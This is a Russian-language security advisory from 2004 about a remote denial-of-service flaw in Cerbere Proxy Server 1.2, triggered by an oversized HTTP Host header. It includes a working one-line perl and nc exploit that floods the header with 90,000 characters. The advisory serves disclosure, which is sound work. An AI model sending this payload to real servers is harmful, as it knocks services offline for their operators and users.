Удаленный отказ в обслуживании в Cerbere Proxy Server

Дата публикации:
02.09.2004
Всего просмотров:
1009
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Cerbere Proxy Server 1.x
Уязвимые версии: Cerbere Proxy Server 1.2

Описание: Уязвимость обнаружена в Cerbere Proxy Server. Удаленный пользователь может вызвать условия отказа в обслуживании.

Удаленный пользователь может представить HTTP GET запрос с длинным полем 'Host:' заголовка, чтобы заставить сервер использовать все доступные ресурсы CPU.

Пример/Эксплоит:

perl -e 'print "GET / HTTP/1.1\r\n" . "Host: " . "A" x 90000 . "\r\n" . "\r\n\r\n" ' | nc "Proxy_IP"

URL производителя: http://cerbere.szym.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Cerbere Proxy Server ver 1.2

или введите имя

CAPTCHA